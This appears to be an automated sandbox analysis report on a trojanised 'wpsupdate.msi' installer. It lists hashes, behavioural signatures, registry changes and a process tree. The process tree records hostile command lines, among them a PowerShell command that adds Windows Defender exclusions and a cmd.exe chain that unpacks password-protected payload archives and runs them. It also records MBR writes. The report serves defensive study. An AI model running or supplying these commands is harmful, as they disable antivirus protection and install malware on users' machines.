Analysis
- max time kernel: 118s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 19-11-2024 04:56
Static task: static1
Behavioral task: behavioral1
  Sample: wpsupdate.msi
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: wpsupdate.msi
  Resource: win10v2004-20241007-en
General
- Target: wpsupdate.msi
- Size: 28.2MB
- MD5: ef294458016f546c5eebd07d2dd98bad
- SHA1: 66bb14f670055272e12899d401b8668cad15fac9
- SHA256: c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
- SHA512: 97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333
- SSDEEP: 786432:r3pUIX4j1lP1FYKJGIC6rO9HN47EbHxjprMfy6s0A:zpUIIj1l9FxJGIzcteEt2e0A
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
2792 | powershell.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) by msiexec.exe, in the order recorded: \??\M:, \??\P:, \??\T:, \??\U:, \??\W:, \??\Z:, \??\H:, \??\M:, \??\P:, \??\Q:, \??\R:, \??\Y:, \??\A:, \??\V:, \??\Y:, \??\G:, \??\W:, \??\X:, \??\L:, \??\O:, \??\H:, \??\J:, \??\K:, \??\O:, \??\R:, \??\S:, \??\A:, \??\K:, \??\T:, \??\V:, \??\X:, \??\Q:, \??\E:, \??\B:, \??\E:, \??\S:, \??\U:, \??\B:, \??\G:, \??\I:, \??\L:, \??\N:, \??\I:, \??\J:, \??\N:, \??\Z:
Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | wpsupdate.exe
Drops file in System32 directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Drops file in Program Files directory (19 IoCs)
description | ioc | Process
File created | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | msiexec.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | MsiExec.exe
File created | C:\Program Files\TransformOptimisticContributor\VC_redist.x64.exe | msiexec.exe
File created | C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | MsiExec.exe
File created | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | msiexec.exe
File created | C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw | msiexec.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File opened for modification | C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
File created | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs | WSEcydALszNI.exe
Drops file in Windows directory (10 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBB25.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.ev3 | DrvInst.exe
File opened for modification | C:\Windows\INF\setupapi.ev1 | DrvInst.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File created | C:\Windows\Installer\f76b931.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\f76b931.msi | msiexec.exe
File created | C:\Windows\Installer\f76b932.ipi | msiexec.exe
File created | C:\Windows\Installer\f76b934.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\f76b932.ipi | msiexec.exe
Executes dropped EXE (4 IoCs)
pid | Process
1668 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
2672 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
1220 | WSEcydALszNI.exe
2444 | wpsupdate.exe
Event Triggered Execution: Installer Packages (2 TTPs, 1 IoCs)
pid | Process
2516 | msiexec.exe
System Location Discovery: System Language Discovery (1 TTPs, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wpsupdate.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WSEcydALszNI.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
1016 | cmd.exe
1884 | PING.EXE
Modifies data under HKEY_USERS (64 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\khdinfo\InfoLastHardInfo | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0 | wpsupdate.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHDt = "19" | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo | wpsupdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\khdinfo\InfoHDModifiedType = "hdidRecalByOldHdidFromRegIsEmpty|2024-11-19" | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD3_C = "a7a81a4a5babfce68580881b050e0402" | wpsupdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD = "a7a81a4a5babfce68580881b050e0402" | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD3Verify_C = 32003000320034002d00310031002d00310039007c00570044004300200032002e0035002b00320033003200310033003800380030003400310036003500200020002000200020002000200020007c00460041002d00350039002d00460042002d00340046002d00410034002d00360037000000 | wpsupdate.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD3t = "19" | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | DrvInst.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c047dd783f3adb01 | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wpsupdate.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | DrvInst.exe
Modifies registry class (22 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media\1 = ";" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\ProductName = "TransformOptimisticContributor" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\InstanceType = "0" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B\0FEBA7E590D91C9459F27EF33A43D970 | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970\ProductFeature | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\PackageCode = "CCD296EAB4068834AB0FC3DB62EF5779" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version = "100859912" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AuthorizedLUAApp = "0" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName = "wpsupdate.msi" | msiexec.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Clients = 3a0000000000 | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970 | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970 | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AdvertiseFlags = "388" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Language = "1033" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Assignment = "1" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\DeploymentFlags = "3" | msiexec.exe
Runs ping.exe (1 TTPs, 1 IoCs)
pid | Process
1884 | PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam (2 IoCs)
pid | Process
1668 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
2672 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Suspicious behavior: EnumeratesProcesses (55 IoCs)
pid | Process | occurrences
2940 | msiexec.exe | 2
2792 | powershell.exe | 1
2444 | wpsupdate.exe | 2
1220 | WSEcydALszNI.exe | 50
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeShutdownPrivilege | 2516 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2516 | msiexec.exe
Token: SeRestorePrivilege | 2940 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2940 | msiexec.exe
Token: SeSecurityPrivilege | 2940 | msiexec.exe
Token: SeCreateTokenPrivilege | 2516 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2516 | msiexec.exe
Token: SeLockMemoryPrivilege | 2516 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2516 | msiexec.exe
Token: SeMachineAccountPrivilege | 2516 | msiexec.exe
Token: SeTcbPrivilege | 2516 | msiexec.exe
Token: SeSecurityPrivilege | 2516 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2516 | msiexec.exe
Token: SeLoadDriverPrivilege | 2516 | msiexec.exe
Token: SeSystemProfilePrivilege | 2516 | msiexec.exe
Token: SeSystemtimePrivilege | 2516 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2516 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2516 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2516 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2516 | msiexec.exe
Token: SeBackupPrivilege | 2516 | msiexec.exe
Token: SeRestorePrivilege | 2516 | msiexec.exe
Token: SeShutdownPrivilege | 2516 | msiexec.exe
Token: SeDebugPrivilege | 2516 | msiexec.exe
Token: SeAuditPrivilege | 2516 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2516 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2516 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2516 | msiexec.exe
Token: SeUndockPrivilege | 2516 | msiexec.exe
Token: SeSyncAgentPrivilege | 2516 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2516 | msiexec.exe
Token: SeManageVolumePrivilege | 2516 | msiexec.exe
Token: SeImpersonatePrivilege | 2516 | msiexec.exe
Token: SeCreateGlobalPrivilege | 2516 | msiexec.exe
Token: SeBackupPrivilege | 2884 | vssvc.exe
Token: SeRestorePrivilege | 2884 | vssvc.exe
Token: SeAuditPrivilege | 2884 | vssvc.exe
Token: SeBackupPrivilege | 2940 | msiexec.exe
Token: SeRestorePrivilege | 2940 | msiexec.exe
Token: SeRestorePrivilege | 2844 | DrvInst.exe (7 consecutive entries)
Token: SeLoadDriverPrivilege | 2844 | DrvInst.exe (3 consecutive entries)
Token: SeRestorePrivilege | 2940 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2940 | msiexec.exe
Token: SeRestorePrivilege | 2940 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2940 | msiexec.exe
Token: SeRestorePrivilege | 2940 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2940 | msiexec.exe
Token: SeDebugPrivilege | 2792 | powershell.exe
Token: SeRestorePrivilege | 1668 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: 35 | 1668 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: SeSecurityPrivilege | 1668 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: SeSecurityPrivilege | 1668 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: SeRestorePrivilege | 2672 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: 35 | 2672 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: SeSecurityPrivilege | 2672 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Token: SeSecurityPrivilege | 2672 | QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
Suspicious use of FindShellTrayWindow (7 IoCs)
pid | Process | occurrences
2516 | msiexec.exe | 2
2444 | wpsupdate.exe | 5
Suspicious use of SendNotifyMessage (5 IoCs)
pid | Process | occurrences
2444 | wpsupdate.exe | 5
Suspicious use of WriteProcessMemory (33 IoCs)
description | pid | Process | procid_target | occurrences
PID 2940 wrote to memory of 560 | 2940 | msiexec.exe | 34 | 5
PID 560 wrote to memory of 2792 | 560 | MsiExec.exe | 36 | 3
PID 560 wrote to memory of 1016 | 560 | MsiExec.exe | 38 | 3
PID 1016 wrote to memory of 1668 | 1016 | cmd.exe | 40 | 4
PID 1016 wrote to memory of 1884 | 1016 | cmd.exe | 41 | 3
PID 1016 wrote to memory of 2672 | 1016 | cmd.exe | 44 | 4
PID 560 wrote to memory of 1220 | 560 | MsiExec.exe | 46 | 4
PID 560 wrote to memory of 2444 | 560 | MsiExec.exe | 47 | 7
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

[depth 1] C:\Windows\system32\msiexec.exe
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi
  PID: 2516
  - Enumerates connected drives
  - Event Triggered Execution: Installer Packages
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

[depth 1] C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  PID: 2940
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\system32\MsiExec.exe
    Command line: C:\Windows\system32\MsiExec.exe -Embedding A73CA5812756B6C0B64396F1AD59FC9C M Global\MSI0000
    PID: 560
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'
      PID: 2792
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    [depth 3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y
      PID: 1016
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
        Command line: "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y
        PID: 1668
        - Drops file in Program Files directory
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\system32\PING.EXE
        Command line: ping 127.0.0.1 -n 2
        PID: 1884
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe

      [depth 4] C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
        Command line: "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y
        PID: 2672
        - Drops file in Program Files directory
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious use of AdjustPrivilegeToken

    [depth 3] C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
      Command line: "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3
      PID: 1220
      - Drops file in Program Files directory
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses

    [depth 3] C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
      Command line: "C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"
      PID: 2444
      - Writes to the Master Boot Record (MBR)
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage

[depth 1] C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 2884
  - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Windows\system32\DrvInst.exe
  Command line: DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000004D8" "00000000000005A4"
  PID: 2844
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
